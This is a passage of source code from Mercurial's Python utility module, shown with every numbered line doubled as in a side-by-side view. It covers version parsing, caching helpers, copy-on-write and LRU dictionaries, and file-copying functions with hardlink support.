1045 (4, 6, None, 'rc0')
1045 (4, 6, None, 'rc0')
1046 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1046 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1047 (4, 6, None, 'rc0+12-425d55e54f98')
1047 (4, 6, None, 'rc0+12-425d55e54f98')
1048 >>> versiontuple(b'.1.2.3')
1048 >>> versiontuple(b'.1.2.3')
1049 (None, None, None, '.1.2.3')
1049 (None, None, None, '.1.2.3')
1050 >>> versiontuple(b'12.34..5')
1050 >>> versiontuple(b'12.34..5')
1051 (12, 34, None, '..5')
1051 (12, 34, None, '..5')
1052 >>> versiontuple(b'1.2.3.4.5.6')
1052 >>> versiontuple(b'1.2.3.4.5.6')
1053 (1, 2, 3, '.4.5.6')
1053 (1, 2, 3, '.4.5.6')
1054 """
1054 """
1055 if not v:
1055 if not v:
1056 v = version()
1056 v = version()
1057 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1057 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1058 if not m:
1058 if not m:
1059 vparts, extra = '', v
1059 vparts, extra = '', v
1060 elif m.group(2):
1060 elif m.group(2):
1061 vparts, extra = m.groups()
1061 vparts, extra = m.groups()
1062 else:
1062 else:
1063 vparts, extra = m.group(1), None
1063 vparts, extra = m.group(1), None
1064
1064
1065 vints = []
1065 vints = []
1066 for i in vparts.split('.'):
1066 for i in vparts.split('.'):
1067 try:
1067 try:
1068 vints.append(int(i))
1068 vints.append(int(i))
1069 except ValueError:
1069 except ValueError:
1070 break
1070 break
1071 # (3, 6) -> (3, 6, None)
1071 # (3, 6) -> (3, 6, None)
1072 while len(vints) < 3:
1072 while len(vints) < 3:
1073 vints.append(None)
1073 vints.append(None)
1074
1074
1075 if n == 2:
1075 if n == 2:
1076 return (vints[0], vints[1])
1076 return (vints[0], vints[1])
1077 if n == 3:
1077 if n == 3:
1078 return (vints[0], vints[1], vints[2])
1078 return (vints[0], vints[1], vints[2])
1079 if n == 4:
1079 if n == 4:
1080 return (vints[0], vints[1], vints[2], extra)
1080 return (vints[0], vints[1], vints[2], extra)
1081
1081
1082 def cachefunc(func):
1082 def cachefunc(func):
1083 '''cache the result of function calls'''
1083 '''cache the result of function calls'''
1084 # XXX doesn't handle keywords args
1084 # XXX doesn't handle keywords args
1085 if func.__code__.co_argcount == 0:
1085 if func.__code__.co_argcount == 0:
1086 cache = []
1086 cache = []
1087 def f():
1087 def f():
1088 if len(cache) == 0:
1088 if len(cache) == 0:
1089 cache.append(func())
1089 cache.append(func())
1090 return cache[0]
1090 return cache[0]
1091 return f
1091 return f
1092 cache = {}
1092 cache = {}
1093 if func.__code__.co_argcount == 1:
1093 if func.__code__.co_argcount == 1:
1094 # we gain a small amount of time because
1094 # we gain a small amount of time because
1095 # we don't need to pack/unpack the list
1095 # we don't need to pack/unpack the list
1096 def f(arg):
1096 def f(arg):
1097 if arg not in cache:
1097 if arg not in cache:
1098 cache[arg] = func(arg)
1098 cache[arg] = func(arg)
1099 return cache[arg]
1099 return cache[arg]
1100 else:
1100 else:
1101 def f(*args):
1101 def f(*args):
1102 if args not in cache:
1102 if args not in cache:
1103 cache[args] = func(*args)
1103 cache[args] = func(*args)
1104 return cache[args]
1104 return cache[args]
1105
1105
1106 return f
1106 return f
1107
1107
1108 class cow(object):
1108 class cow(object):
1109 """helper class to make copy-on-write easier
1109 """helper class to make copy-on-write easier
1110
1110
1111 Call preparewrite before doing any writes.
1111 Call preparewrite before doing any writes.
1112 """
1112 """
1113
1113
1114 def preparewrite(self):
1114 def preparewrite(self):
1115 """call this before writes, return self or a copied new object"""
1115 """call this before writes, return self or a copied new object"""
1116 if getattr(self, '_copied', 0):
1116 if getattr(self, '_copied', 0):
1117 self._copied -= 1
1117 self._copied -= 1
1118 return self.__class__(self)
1118 return self.__class__(self)
1119 return self
1119 return self
1120
1120
1121 def copy(self):
1121 def copy(self):
1122 """always do a cheap copy"""
1122 """always do a cheap copy"""
1123 self._copied = getattr(self, '_copied', 0) + 1
1123 self._copied = getattr(self, '_copied', 0) + 1
1124 return self
1124 return self
1125
1125
1126 class sortdict(collections.OrderedDict):
1126 class sortdict(collections.OrderedDict):
1127 '''a simple sorted dictionary
1127 '''a simple sorted dictionary
1128
1128
1129 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1129 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1130 >>> d2 = d1.copy()
1130 >>> d2 = d1.copy()
1131 >>> d2
1131 >>> d2
1132 sortdict([('a', 0), ('b', 1)])
1132 sortdict([('a', 0), ('b', 1)])
1133 >>> d2.update([(b'a', 2)])
1133 >>> d2.update([(b'a', 2)])
1134 >>> list(d2.keys()) # should still be in last-set order
1134 >>> list(d2.keys()) # should still be in last-set order
1135 ['b', 'a']
1135 ['b', 'a']
1136 '''
1136 '''
1137
1137
1138 def __setitem__(self, key, value):
1138 def __setitem__(self, key, value):
1139 if key in self:
1139 if key in self:
1140 del self[key]
1140 del self[key]
1141 super(sortdict, self).__setitem__(key, value)
1141 super(sortdict, self).__setitem__(key, value)
1142
1142
1143 if pycompat.ispypy:
1143 if pycompat.ispypy:
1144 # __setitem__() isn't called as of PyPy 5.8.0
1144 # __setitem__() isn't called as of PyPy 5.8.0
1145 def update(self, src):
1145 def update(self, src):
1146 if isinstance(src, dict):
1146 if isinstance(src, dict):
1147 src = src.iteritems()
1147 src = src.iteritems()
1148 for k, v in src:
1148 for k, v in src:
1149 self[k] = v
1149 self[k] = v
1150
1150
1151 class cowdict(cow, dict):
1151 class cowdict(cow, dict):
1152 """copy-on-write dict
1152 """copy-on-write dict
1153
1153
1154 Be sure to call d = d.preparewrite() before writing to d.
1154 Be sure to call d = d.preparewrite() before writing to d.
1155
1155
1156 >>> a = cowdict()
1156 >>> a = cowdict()
1157 >>> a is a.preparewrite()
1157 >>> a is a.preparewrite()
1158 True
1158 True
1159 >>> b = a.copy()
1159 >>> b = a.copy()
1160 >>> b is a
1160 >>> b is a
1161 True
1161 True
1162 >>> c = b.copy()
1162 >>> c = b.copy()
1163 >>> c is a
1163 >>> c is a
1164 True
1164 True
1165 >>> a = a.preparewrite()
1165 >>> a = a.preparewrite()
1166 >>> b is a
1166 >>> b is a
1167 False
1167 False
1168 >>> a is a.preparewrite()
1168 >>> a is a.preparewrite()
1169 True
1169 True
1170 >>> c = c.preparewrite()
1170 >>> c = c.preparewrite()
1171 >>> b is c
1171 >>> b is c
1172 False
1172 False
1173 >>> b is b.preparewrite()
1173 >>> b is b.preparewrite()
1174 True
1174 True
1175 """
1175 """
1176
1176
1177 class cowsortdict(cow, sortdict):
1177 class cowsortdict(cow, sortdict):
1178 """copy-on-write sortdict
1178 """copy-on-write sortdict
1179
1179
1180 Be sure to call d = d.preparewrite() before writing to d.
1180 Be sure to call d = d.preparewrite() before writing to d.
1181 """
1181 """
1182
1182
1183 class transactional(object):
1183 class transactional(object):
1184 """Base class for making a transactional type into a context manager."""
1184 """Base class for making a transactional type into a context manager."""
1185 __metaclass__ = abc.ABCMeta
1185 __metaclass__ = abc.ABCMeta
1186
1186
1187 @abc.abstractmethod
1187 @abc.abstractmethod
1188 def close(self):
1188 def close(self):
1189 """Successfully closes the transaction."""
1189 """Successfully closes the transaction."""
1190
1190
1191 @abc.abstractmethod
1191 @abc.abstractmethod
1192 def release(self):
1192 def release(self):
1193 """Marks the end of the transaction.
1193 """Marks the end of the transaction.
1194
1194
1195 If the transaction has not been closed, it will be aborted.
1195 If the transaction has not been closed, it will be aborted.
1196 """
1196 """
1197
1197
1198 def __enter__(self):
1198 def __enter__(self):
1199 return self
1199 return self
1200
1200
1201 def __exit__(self, exc_type, exc_val, exc_tb):
1201 def __exit__(self, exc_type, exc_val, exc_tb):
1202 try:
1202 try:
1203 if exc_type is None:
1203 if exc_type is None:
1204 self.close()
1204 self.close()
1205 finally:
1205 finally:
1206 self.release()
1206 self.release()
1207
1207
1208 @contextlib.contextmanager
1208 @contextlib.contextmanager
1209 def acceptintervention(tr=None):
1209 def acceptintervention(tr=None):
1210 """A context manager that closes the transaction on InterventionRequired
1210 """A context manager that closes the transaction on InterventionRequired
1211
1211
1212 If no transaction was provided, this simply runs the body and returns
1212 If no transaction was provided, this simply runs the body and returns
1213 """
1213 """
1214 if not tr:
1214 if not tr:
1215 yield
1215 yield
1216 return
1216 return
1217 try:
1217 try:
1218 yield
1218 yield
1219 tr.close()
1219 tr.close()
1220 except error.InterventionRequired:
1220 except error.InterventionRequired:
1221 tr.close()
1221 tr.close()
1222 raise
1222 raise
1223 finally:
1223 finally:
1224 tr.release()
1224 tr.release()
1225
1225
1226 @contextlib.contextmanager
1226 @contextlib.contextmanager
1227 def nullcontextmanager():
1227 def nullcontextmanager():
1228 yield
1228 yield
1229
1229
1230 class _lrucachenode(object):
1230 class _lrucachenode(object):
1231 """A node in a doubly linked list.
1231 """A node in a doubly linked list.
1232
1232
1233 Holds a reference to nodes on either side as well as a key-value
1233 Holds a reference to nodes on either side as well as a key-value
1234 pair for the dictionary entry.
1234 pair for the dictionary entry.
1235 """
1235 """
1236 __slots__ = (u'next', u'prev', u'key', u'value')
1236 __slots__ = (u'next', u'prev', u'key', u'value')
1237
1237
1238 def __init__(self):
1238 def __init__(self):
1239 self.next = None
1239 self.next = None
1240 self.prev = None
1240 self.prev = None
1241
1241
1242 self.key = _notset
1242 self.key = _notset
1243 self.value = None
1243 self.value = None
1244
1244
1245 def markempty(self):
1245 def markempty(self):
1246 """Mark the node as emptied."""
1246 """Mark the node as emptied."""
1247 self.key = _notset
1247 self.key = _notset
1248
1248
1249 class lrucachedict(object):
1249 class lrucachedict(object):
1250 """Dict that caches most recent accesses and sets.
1250 """Dict that caches most recent accesses and sets.
1251
1251
1252 The dict consists of an actual backing dict - indexed by original
1252 The dict consists of an actual backing dict - indexed by original
1253 key - and a doubly linked circular list defining the order of entries in
1253 key - and a doubly linked circular list defining the order of entries in
1254 the cache.
1254 the cache.
1255
1255
1256 The head node is the newest entry in the cache. If the cache is full,
1256 The head node is the newest entry in the cache. If the cache is full,
1257 we recycle head.prev and make it the new head. Cache accesses result in
1257 we recycle head.prev and make it the new head. Cache accesses result in
1258 the node being moved to before the existing head and being marked as the
1258 the node being moved to before the existing head and being marked as the
1259 new head node.
1259 new head node.
1260 """
1260 """
1261 def __init__(self, max):
1261 def __init__(self, max):
1262 self._cache = {}
1262 self._cache = {}
1263
1263
1264 self._head = head = _lrucachenode()
1264 self._head = head = _lrucachenode()
1265 head.prev = head
1265 head.prev = head
1266 head.next = head
1266 head.next = head
1267 self._size = 1
1267 self._size = 1
1268 self._capacity = max
1268 self._capacity = max
1269
1269
1270 def __len__(self):
1270 def __len__(self):
1271 return len(self._cache)
1271 return len(self._cache)
1272
1272
1273 def __contains__(self, k):
1273 def __contains__(self, k):
1274 return k in self._cache
1274 return k in self._cache
1275
1275
1276 def __iter__(self):
1276 def __iter__(self):
1277 # We don't have to iterate in cache order, but why not.
1277 # We don't have to iterate in cache order, but why not.
1278 n = self._head
1278 n = self._head
1279 for i in range(len(self._cache)):
1279 for i in range(len(self._cache)):
1280 yield n.key
1280 yield n.key
1281 n = n.next
1281 n = n.next
1282
1282
1283 def __getitem__(self, k):
1283 def __getitem__(self, k):
1284 node = self._cache[k]
1284 node = self._cache[k]
1285 self._movetohead(node)
1285 self._movetohead(node)
1286 return node.value
1286 return node.value
1287
1287
1288 def __setitem__(self, k, v):
1288 def __setitem__(self, k, v):
1289 node = self._cache.get(k)
1289 node = self._cache.get(k)
1290 # Replace existing value and mark as newest.
1290 # Replace existing value and mark as newest.
1291 if node is not None:
1291 if node is not None:
1292 node.value = v
1292 node.value = v
1293 self._movetohead(node)
1293 self._movetohead(node)
1294 return
1294 return
1295
1295
1296 if self._size < self._capacity:
1296 if self._size < self._capacity:
1297 node = self._addcapacity()
1297 node = self._addcapacity()
1298 else:
1298 else:
1299 # Grab the last/oldest item.
1299 # Grab the last/oldest item.
1300 node = self._head.prev
1300 node = self._head.prev
1301
1301
1302 # At capacity. Kill the old entry.
1302 # At capacity. Kill the old entry.
1303 if node.key is not _notset:
1303 if node.key is not _notset:
1304 del self._cache[node.key]
1304 del self._cache[node.key]
1305
1305
1306 node.key = k
1306 node.key = k
1307 node.value = v
1307 node.value = v
1308 self._cache[k] = node
1308 self._cache[k] = node
1309 # And mark it as newest entry. No need to adjust order since it
1309 # And mark it as newest entry. No need to adjust order since it
1310 # is already self._head.prev.
1310 # is already self._head.prev.
1311 self._head = node
1311 self._head = node
1312
1312
1313 def __delitem__(self, k):
1313 def __delitem__(self, k):
1314 node = self._cache.pop(k)
1314 node = self._cache.pop(k)
1315 node.markempty()
1315 node.markempty()
1316
1316
1317 # Temporarily mark as newest item before re-adjusting head to make
1317 # Temporarily mark as newest item before re-adjusting head to make
1318 # this node the oldest item.
1318 # this node the oldest item.
1319 self._movetohead(node)
1319 self._movetohead(node)
1320 self._head = node.next
1320 self._head = node.next
1321
1321
1322 # Additional dict methods.
1322 # Additional dict methods.
1323
1323
1324 def get(self, k, default=None):
1324 def get(self, k, default=None):
1325 try:
1325 try:
1326 return self._cache[k].value
1326 return self._cache[k].value
1327 except KeyError:
1327 except KeyError:
1328 return default
1328 return default
1329
1329
1330 def clear(self):
1330 def clear(self):
1331 n = self._head
1331 n = self._head
1332 while n.key is not _notset:
1332 while n.key is not _notset:
1333 n.markempty()
1333 n.markempty()
1334 n = n.next
1334 n = n.next
1335
1335
1336 self._cache.clear()
1336 self._cache.clear()
1337
1337
1338 def copy(self):
1338 def copy(self):
1339 result = lrucachedict(self._capacity)
1339 result = lrucachedict(self._capacity)
1340 n = self._head.prev
1340 n = self._head.prev
1341 # Iterate in oldest-to-newest order, so the copy has the right ordering
1341 # Iterate in oldest-to-newest order, so the copy has the right ordering
1342 for i in range(len(self._cache)):
1342 for i in range(len(self._cache)):
1343 result[n.key] = n.value
1343 result[n.key] = n.value
1344 n = n.prev
1344 n = n.prev
1345 return result
1345 return result
1346
1346
1347 def _movetohead(self, node):
1347 def _movetohead(self, node):
1348 """Mark a node as the newest, making it the new head.
1348 """Mark a node as the newest, making it the new head.
1349
1349
1350 When a node is accessed, it becomes the freshest entry in the LRU
1350 When a node is accessed, it becomes the freshest entry in the LRU
1351 list, which is denoted by self._head.
1351 list, which is denoted by self._head.
1352
1352
1353 Visually, let's make ``N`` the new head node (* denotes head):
1353 Visually, let's make ``N`` the new head node (* denotes head):
1354
1354
1355 previous/oldest <-> head <-> next/next newest
1355 previous/oldest <-> head <-> next/next newest
1356
1356
1357 ----<->--- A* ---<->-----
1357 ----<->--- A* ---<->-----
1358 | |
1358 | |
1359 E <-> D <-> N <-> C <-> B
1359 E <-> D <-> N <-> C <-> B
1360
1360
1361 To:
1361 To:
1362
1362
1363 ----<->--- N* ---<->-----
1363 ----<->--- N* ---<->-----
1364 | |
1364 | |
1365 E <-> D <-> C <-> B <-> A
1365 E <-> D <-> C <-> B <-> A
1366
1366
1367 This requires the following moves:
1367 This requires the following moves:
1368
1368
1369 C.next = D (node.prev.next = node.next)
1369 C.next = D (node.prev.next = node.next)
1370 D.prev = C (node.next.prev = node.prev)
1370 D.prev = C (node.next.prev = node.prev)
1371 E.next = N (head.prev.next = node)
1371 E.next = N (head.prev.next = node)
1372 N.prev = E (node.prev = head.prev)
1372 N.prev = E (node.prev = head.prev)
1373 N.next = A (node.next = head)
1373 N.next = A (node.next = head)
1374 A.prev = N (head.prev = node)
1374 A.prev = N (head.prev = node)
1375 """
1375 """
1376 head = self._head
1376 head = self._head
1377 # C.next = D
1377 # C.next = D
1378 node.prev.next = node.next
1378 node.prev.next = node.next
1379 # D.prev = C
1379 # D.prev = C
1380 node.next.prev = node.prev
1380 node.next.prev = node.prev
1381 # N.prev = E
1381 # N.prev = E
1382 node.prev = head.prev
1382 node.prev = head.prev
1383 # N.next = A
1383 # N.next = A
1384 # It is tempting to do just "head" here, however if node is
1384 # It is tempting to do just "head" here, however if node is
1385 # adjacent to head, this will do bad things.
1385 # adjacent to head, this will do bad things.
1386 node.next = head.prev.next
1386 node.next = head.prev.next
1387 # E.next = N
1387 # E.next = N
1388 node.next.prev = node
1388 node.next.prev = node
1389 # A.prev = N
1389 # A.prev = N
1390 node.prev.next = node
1390 node.prev.next = node
1391
1391
1392 self._head = node
1392 self._head = node
1393
1393
1394 def _addcapacity(self):
1394 def _addcapacity(self):
1395 """Add a node to the circular linked list.
1395 """Add a node to the circular linked list.
1396
1396
1397 The new node is inserted before the head node.
1397 The new node is inserted before the head node.
1398 """
1398 """
1399 head = self._head
1399 head = self._head
1400 node = _lrucachenode()
1400 node = _lrucachenode()
1401 head.prev.next = node
1401 head.prev.next = node
1402 node.prev = head.prev
1402 node.prev = head.prev
1403 node.next = head
1403 node.next = head
1404 head.prev = node
1404 head.prev = node
1405 self._size += 1
1405 self._size += 1
1406 return node
1406 return node
1407
1407
1408 def lrucachefunc(func):
1408 def lrucachefunc(func):
1409 '''cache most recent results of function calls'''
1409 '''cache most recent results of function calls'''
1410 cache = {}
1410 cache = {}
1411 order = collections.deque()
1411 order = collections.deque()
1412 if func.__code__.co_argcount == 1:
1412 if func.__code__.co_argcount == 1:
1413 def f(arg):
1413 def f(arg):
1414 if arg not in cache:
1414 if arg not in cache:
1415 if len(cache) > 20:
1415 if len(cache) > 20:
1416 del cache[order.popleft()]
1416 del cache[order.popleft()]
1417 cache[arg] = func(arg)
1417 cache[arg] = func(arg)
1418 else:
1418 else:
1419 order.remove(arg)
1419 order.remove(arg)
1420 order.append(arg)
1420 order.append(arg)
1421 return cache[arg]
1421 return cache[arg]
1422 else:
1422 else:
1423 def f(*args):
1423 def f(*args):
1424 if args not in cache:
1424 if args not in cache:
1425 if len(cache) > 20:
1425 if len(cache) > 20:
1426 del cache[order.popleft()]
1426 del cache[order.popleft()]
1427 cache[args] = func(*args)
1427 cache[args] = func(*args)
1428 else:
1428 else:
1429 order.remove(args)
1429 order.remove(args)
1430 order.append(args)
1430 order.append(args)
1431 return cache[args]
1431 return cache[args]
1432
1432
1433 return f
1433 return f
1434
1434
1435 class propertycache(object):
1435 class propertycache(object):
1436 def __init__(self, func):
1436 def __init__(self, func):
1437 self.func = func
1437 self.func = func
1438 self.name = func.__name__
1438 self.name = func.__name__
1439 def __get__(self, obj, type=None):
1439 def __get__(self, obj, type=None):
1440 result = self.func(obj)
1440 result = self.func(obj)
1441 self.cachevalue(obj, result)
1441 self.cachevalue(obj, result)
1442 return result
1442 return result
1443
1443
1444 def cachevalue(self, obj, value):
1444 def cachevalue(self, obj, value):
1445 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1445 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1446 obj.__dict__[self.name] = value
1446 obj.__dict__[self.name] = value
1447
1447
1448 def clearcachedproperty(obj, prop):
1448 def clearcachedproperty(obj, prop):
1449 '''clear a cached property value, if one has been set'''
1449 '''clear a cached property value, if one has been set'''
1450 if prop in obj.__dict__:
1450 if prop in obj.__dict__:
1451 del obj.__dict__[prop]
1451 del obj.__dict__[prop]
1452
1452
1453 def increasingchunks(source, min=1024, max=65536):
1453 def increasingchunks(source, min=1024, max=65536):
1454 '''return no less than min bytes per chunk while data remains,
1454 '''return no less than min bytes per chunk while data remains,
1455 doubling min after each chunk until it reaches max'''
1455 doubling min after each chunk until it reaches max'''
1456 def log2(x):
1456 def log2(x):
1457 if not x:
1457 if not x:
1458 return 0
1458 return 0
1459 i = 0
1459 i = 0
1460 while x:
1460 while x:
1461 x >>= 1
1461 x >>= 1
1462 i += 1
1462 i += 1
1463 return i - 1
1463 return i - 1
1464
1464
1465 buf = []
1465 buf = []
1466 blen = 0
1466 blen = 0
1467 for chunk in source:
1467 for chunk in source:
1468 buf.append(chunk)
1468 buf.append(chunk)
1469 blen += len(chunk)
1469 blen += len(chunk)
1470 if blen >= min:
1470 if blen >= min:
1471 if min < max:
1471 if min < max:
1472 min = min << 1
1472 min = min << 1
1473 nmin = 1 << log2(blen)
1473 nmin = 1 << log2(blen)
1474 if nmin > min:
1474 if nmin > min:
1475 min = nmin
1475 min = nmin
1476 if min > max:
1476 if min > max:
1477 min = max
1477 min = max
1478 yield ''.join(buf)
1478 yield ''.join(buf)
1479 blen = 0
1479 blen = 0
1480 buf = []
1480 buf = []
1481 if buf:
1481 if buf:
1482 yield ''.join(buf)
1482 yield ''.join(buf)
1483
1483
1484 def always(fn):
1484 def always(fn):
1485 return True
1485 return True
1486
1486
1487 def never(fn):
1487 def never(fn):
1488 return False
1488 return False
1489
1489
1490 def nogc(func):
1490 def nogc(func):
1491 """disable garbage collector
1491 """disable garbage collector
1492
1492
1493 Python's garbage collector triggers a GC each time a certain number of
1493 Python's garbage collector triggers a GC each time a certain number of
1494 container objects (the number being defined by gc.get_threshold()) are
1494 container objects (the number being defined by gc.get_threshold()) are
1495 allocated even when marked not to be tracked by the collector. Tracking has
1495 allocated even when marked not to be tracked by the collector. Tracking has
1496 no effect on when GCs are triggered, only on what objects the GC looks
1496 no effect on when GCs are triggered, only on what objects the GC looks
1497 into. As a workaround, disable GC while building complex (huge)
1497 into. As a workaround, disable GC while building complex (huge)
1498 containers.
1498 containers.
1499
1499
1500 This garbage collector issue have been fixed in 2.7. But it still affect
1500 This garbage collector issue have been fixed in 2.7. But it still affect
1501 CPython's performance.
1501 CPython's performance.
1502 """
1502 """
1503 def wrapper(*args, **kwargs):
1503 def wrapper(*args, **kwargs):
1504 gcenabled = gc.isenabled()
1504 gcenabled = gc.isenabled()
1505 gc.disable()
1505 gc.disable()
1506 try:
1506 try:
1507 return func(*args, **kwargs)
1507 return func(*args, **kwargs)
1508 finally:
1508 finally:
1509 if gcenabled:
1509 if gcenabled:
1510 gc.enable()
1510 gc.enable()
1511 return wrapper
1511 return wrapper
1512
1512
1513 if pycompat.ispypy:
1513 if pycompat.ispypy:
1514 # PyPy runs slower with gc disabled
1514 # PyPy runs slower with gc disabled
1515 nogc = lambda x: x
1515 nogc = lambda x: x
1516
1516
1517 def pathto(root, n1, n2):
1517 def pathto(root, n1, n2):
1518 '''return the relative path from one place to another.
1518 '''return the relative path from one place to another.
1519 root should use os.sep to separate directories
1519 root should use os.sep to separate directories
1520 n1 should use os.sep to separate directories
1520 n1 should use os.sep to separate directories
1521 n2 should use "/" to separate directories
1521 n2 should use "/" to separate directories
1522 returns an os.sep-separated path.
1522 returns an os.sep-separated path.
1523
1523
1524 If n1 is a relative path, it's assumed it's
1524 If n1 is a relative path, it's assumed it's
1525 relative to root.
1525 relative to root.
1526 n2 should always be relative to root.
1526 n2 should always be relative to root.
1527 '''
1527 '''
1528 if not n1:
1528 if not n1:
1529 return localpath(n2)
1529 return localpath(n2)
1530 if os.path.isabs(n1):
1530 if os.path.isabs(n1):
1531 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1531 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1532 return os.path.join(root, localpath(n2))
1532 return os.path.join(root, localpath(n2))
1533 n2 = '/'.join((pconvert(root), n2))
1533 n2 = '/'.join((pconvert(root), n2))
1534 a, b = splitpath(n1), n2.split('/')
1534 a, b = splitpath(n1), n2.split('/')
1535 a.reverse()
1535 a.reverse()
1536 b.reverse()
1536 b.reverse()
1537 while a and b and a[-1] == b[-1]:
1537 while a and b and a[-1] == b[-1]:
1538 a.pop()
1538 a.pop()
1539 b.pop()
1539 b.pop()
1540 b.reverse()
1540 b.reverse()
1541 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1541 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1542
1542
1543 # the location of data files matching the source code
1543 # the location of data files matching the source code
1544 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1544 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1545 # executable version (py2exe) doesn't support __file__
1545 # executable version (py2exe) doesn't support __file__
1546 datapath = os.path.dirname(pycompat.sysexecutable)
1546 datapath = os.path.dirname(pycompat.sysexecutable)
1547 else:
1547 else:
1548 datapath = os.path.dirname(pycompat.fsencode(__file__))
1548 datapath = os.path.dirname(pycompat.fsencode(__file__))
1549
1549
1550 i18n.setdatapath(datapath)
1550 i18n.setdatapath(datapath)
1551
1551
1552 def checksignature(func):
1552 def checksignature(func):
1553 '''wrap a function with code to check for calling errors'''
1553 '''wrap a function with code to check for calling errors'''
1554 def check(*args, **kwargs):
1554 def check(*args, **kwargs):
1555 try:
1555 try:
1556 return func(*args, **kwargs)
1556 return func(*args, **kwargs)
1557 except TypeError:
1557 except TypeError:
1558 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1558 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1559 raise error.SignatureError
1559 raise error.SignatureError
1560 raise
1560 raise
1561
1561
1562 return check
1562 return check
1563
1563
1564 # a whilelist of known filesystems where hardlink works reliably
1564 # a whilelist of known filesystems where hardlink works reliably
1565 _hardlinkfswhitelist = {
1565 _hardlinkfswhitelist = {
1566 'apfs',
1566 'apfs',
1567 'btrfs',
1567 'btrfs',
1568 'ext2',
1568 'ext2',
1569 'ext3',
1569 'ext3',
1570 'ext4',
1570 'ext4',
1571 'hfs',
1571 'hfs',
1572 'jfs',
1572 'jfs',
1573 'NTFS',
1573 'NTFS',
1574 'reiserfs',
1574 'reiserfs',
1575 'tmpfs',
1575 'tmpfs',
1576 'ufs',
1576 'ufs',
1577 'xfs',
1577 'xfs',
1578 'zfs',
1578 'zfs',
1579 }
1579 }
1580
1580
1581 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1581 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1582 '''copy a file, preserving mode and optionally other stat info like
1582 '''copy a file, preserving mode and optionally other stat info like
1583 atime/mtime
1583 atime/mtime
1584
1584
1585 checkambig argument is used with filestat, and is useful only if
1585 checkambig argument is used with filestat, and is useful only if
1586 destination file is guarded by any lock (e.g. repo.lock or
1586 destination file is guarded by any lock (e.g. repo.lock or
1587 repo.wlock).
1587 repo.wlock).
1588
1588
1589 copystat and checkambig should be exclusive.
1589 copystat and checkambig should be exclusive.
1590 '''
1590 '''
1591 assert not (copystat and checkambig)
1591 assert not (copystat and checkambig)
1592 oldstat = None
1592 oldstat = None
1593 if os.path.lexists(dest):
1593 if os.path.lexists(dest):
1594 if checkambig:
1594 if checkambig:
1595 oldstat = checkambig and filestat.frompath(dest)
1595 oldstat = checkambig and filestat.frompath(dest)
1596 unlink(dest)
1596 unlink(dest)
1597 if hardlink:
1597 if hardlink:
1598 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1598 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1599 # unless we are confident that dest is on a whitelisted filesystem.
1599 # unless we are confident that dest is on a whitelisted filesystem.
1600 try:
1600 try:
1601 fstype = getfstype(os.path.dirname(dest))
1601 fstype = getfstype(os.path.dirname(dest))
1602 except OSError:
1602 except OSError:
1603 fstype = None
1603 fstype = None
1604 if fstype not in _hardlinkfswhitelist:
1604 if fstype not in _hardlinkfswhitelist:
1605 hardlink = False
1605 hardlink = False
1606 if hardlink:
1606 if hardlink:
1607 try:
1607 try:
1608 oslink(src, dest)
1608 oslink(src, dest)
1609 return
1609 return
1610 except (IOError, OSError):
1610 except (IOError, OSError):
1611 pass # fall back to normal copy
1611 pass # fall back to normal copy
1612 if os.path.islink(src):
1612 if os.path.islink(src):
1613 os.symlink(os.readlink(src), dest)
1613 os.symlink(os.readlink(src), dest)
1614 # copytime is ignored for symlinks, but in general copytime isn't needed
1614 # copytime is ignored for symlinks, but in general copytime isn't needed
1615 # for them anyway
1615 # for them anyway
1616 else:
1616 else:
1617 try:
1617 try:
1618 shutil.copyfile(src, dest)
1618 shutil.copyfile(src, dest)
1619 if copystat:
1619 if copystat:
1620 # copystat also copies mode
1620 # copystat also copies mode
1621 shutil.copystat(src, dest)
1621 shutil.copystat(src, dest)
1622 else:
1622 else:
1623 shutil.copymode(src, dest)
1623 shutil.copymode(src, dest)
1624 if oldstat and oldstat.stat:
1624 if oldstat and oldstat.stat:
1625 newstat = filestat.frompath(dest)
1625 newstat = filestat.frompath(dest)
1626 if newstat.isambig(oldstat):
1626 if newstat.isambig(oldstat):
1627 # stat of copied file is ambiguous to original one
1627 # stat of copied file is ambiguous to original one
1628 advanced = (
1628 advanced = (
1629 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1629 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1630 os.utime(dest, (advanced, advanced))
1630 os.utime(dest, (advanced, advanced))
1631 except shutil.Error as inst:
1631 except shutil.Error as inst:
1632 raise error.Abort(str(inst))
1632 raise error.Abort(str(inst))
1633
1633
1634 def copyfiles(src, dst, hardlink=None, progress=None):
1634 def copyfiles(src, dst, hardlink=None, progress=None):
1635 """Copy a directory tree using hardlinks if possible."""
1635 """Copy a directory tree using hardlinks if possible."""
1636 num = 0
1636 num = 0
1637
1637
1638 def settopic():
1638 def settopic():
1639 if progress:
1639 if progress:
1640 progress.topic = _('linking') if hardlink else _('copying')
1640 progress.topic = _('linking') if hardlink else _('copying')
1641
1641
1642 if os.path.isdir(src):
1642 if os.path.isdir(src):
1643 if hardlink is None:
1643 if hardlink is None:
1644 hardlink = (os.stat(src).st_dev ==
1644 hardlink = (os.stat(src).st_dev ==
1645 os.stat(os.path.dirname(dst)).st_dev)
1645 os.stat(os.path.dirname(dst)).st_dev)
1646 settopic()
1646 settopic()
1647 os.mkdir(dst)
1647 os.mkdir(dst)
1648 for name, kind in listdir(src):
1648 for name, kind in listdir(src):
1649 srcname = os.path.join(src, name)
